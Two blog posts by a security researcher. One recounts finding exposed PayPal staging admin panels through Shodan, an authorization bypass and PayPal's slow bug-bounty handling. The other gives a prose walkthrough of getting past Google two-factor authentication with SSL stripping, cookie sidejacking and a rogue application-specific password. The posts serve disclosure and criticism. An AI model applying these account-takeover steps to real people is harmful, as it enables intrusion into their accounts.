PayPal Bug Bounty - a lesson in not being a fuckup.
PayPal started their bug bounty program on June 21st 2012. When I saw that, I decided that the race was on. A new market place had opened, and I was going to get in on it. I had my first opportunity to take my first shots at finding a flaw on June 29th. On first thought, I assumed that a company like paypal was going to be a well audited, and an air tight group. I was wrong. really wrong.
This recanting will cover the bugs I found and paypal’s response, including timelines. I hope this serves as a ‘what not to do’ guide for others creating bug bounty programs, and to give those who are participating in such programs an idea of what to expect when it is not run well.
June 29th
I started my hunt like I start all of my audits, on shodanhq.com. My first search query: “admin paypal” … not expecting to get any results of value. As you can see, there are still many active hits to this date with that search term.
Once I saw the ‘stageXmbXXX’ in the URL, I realized that for whatever reason, PayPal’s staging netblock was publically accessible. In short: this is going to be a shitshow.
After a few minutes of poking around, I started on one of them to find bugs. The first one: Authorization bypass.
As you can see trying ‘lsmith’ yielded ‘Lori Smith’. This is a good sign. So I started to move on looking for something a bit more substantial.
At first I saw the error and was a bit let down, then I noticed that it actually logged me in as user ‘jsmith’, which was actually ‘Janine Smith’. Progress. But this user didn’t have the correct permission to access this admin panel either. At this point, I wasn’t even sure what this admin panel was to and I wanted to play it safe, as to not violate the terms of the bug bounty program which clearly stated that it was in violation to access live users data.
After some tweaking the syntax, I got this message. This was extremely encouraging. I got an internal IP address to tell me where in this mystical place I was connecting to. But I still wasn’t sure what this even was. So I grabbed the page title and plugged it into Google hoping to get some lead.
The first result didn’t answer any questions, but was a big WTF moment. So I went on to the next results. Legal exhibits from various lawsuits. And I found this, an actual print out directly from this ‘admin’ panel.
At this point, I’m giddy. This is obviously going to be big. (screw your xss ‘bug’ I found the engine running the mother fucking jackpot). At this point, I realize I’m on the verge of crossing the line when it comes to the term of the bug bounty program, so I start writing up my report and look forward to seeing what comes of this.
Report finished up, I went to download PayPal’s PGP key to encrypt it. But problem. The Key that was linked to by their official page was expired. So I had to email them to get a working PGP key. Who announced this program and didn’t have the foresight to not link to a fucking expired PGP key to send them reports with?
July 5th:
I finally got the reply with a valid PGP Key. Sent off my report awaiting a speedy reply as to how serious I thought this was.
July 19th:
I finally got an automated notification that my report was received.
August 7th:
I get another automated update saying that my report had been closed as it was ‘invalid’. I’m pissed off. So I fire back an email asking if this meant it was okay to publicly report what I had found.
August 8th:
I get a response back asking not to do that, as the case was closed because the researcher was not able to recreate it. It was going to be reclassified into a different category. (full disclosure, at this point I had emailed in many other things I had found in that QA netblock, I might get around to covering them in another post).
August 21st:
An actual hand written response to another bug that reassured that this bug was still active and that I would be paid after it was done being fixed, and to not publicly disclosed anything until that time.
August 29th:
I receive a payment notice for ‘xss vulnerability.’ I email them back asking if this was correct. I never received a response.
In closing, You’ve got to actually communicate with your researchers. There is nothing more frustrating than trying to tell someone about their problem, and being stonewalled.
I’ll never waste my time with PayPal again. And you shouldn’t either.
Exploiting Google Two-Factor Authentication
Two-Factor authentication in Google is held as the penultimate stop gap in thwarting hackers from getting into email, apps, calendars, and more. So how do we beat it?
I was pondering around one day while managing my corporate two-factor setting in Google Apps and realized that Application Specific passwords, while convenient, are the downfall of the security of Two-Factor in Google Apps.
Here’s what I found, it is not so much an exploit, but rather a flaw derived for the sake of convenience.
The scenario:
Alice is on a coffee shop wifi network and wants to log in to check her email. Alice uses two-factor authentication, and a default browser.
Bob is a hacker. Bob wants in Alice’s email. But Bob knows he can’t get into it because she uses two-factor authentication. Bob gets clever.
Bob man in the middles the wifi network, watching for Alice to log in. Bob runs ssl strip to capture Alice’s plaintext Google password. Bob watches Alice enter in her Two-Factor token, leaving the box marked ‘leave me logged in for 30 days on this computer checked’. Even if Alice unchecks that box, Bob can manipulate the POST request data to make sure it’s checked.
Now Bob sidejack’s Alice’s cookies. And goes to accounts.google.com. Once he loads up the page with Alice’s cookies, he will be prompted to enter in her password. Easy since Bob now has the plaintext password to enter in. Note: Bob is not prompted to enter in a Two-Factor token.
Bob navigates to Security > Two-Factor (edit) > Manage Application Specific Passwords > Generate New Application Specific Password.
Bob Gets a nice little password to jot down, that will let him have access now to Alice’s Account whenever he’d like, without having to worry about the Two-Factor token. Alice is never notified that Bob generated a new One Time Password.
Full Disclosure, I talked with Google’s Security Team about this, but it was deemed not a problem since the level of exploitation that would have to take place would be outside their control.
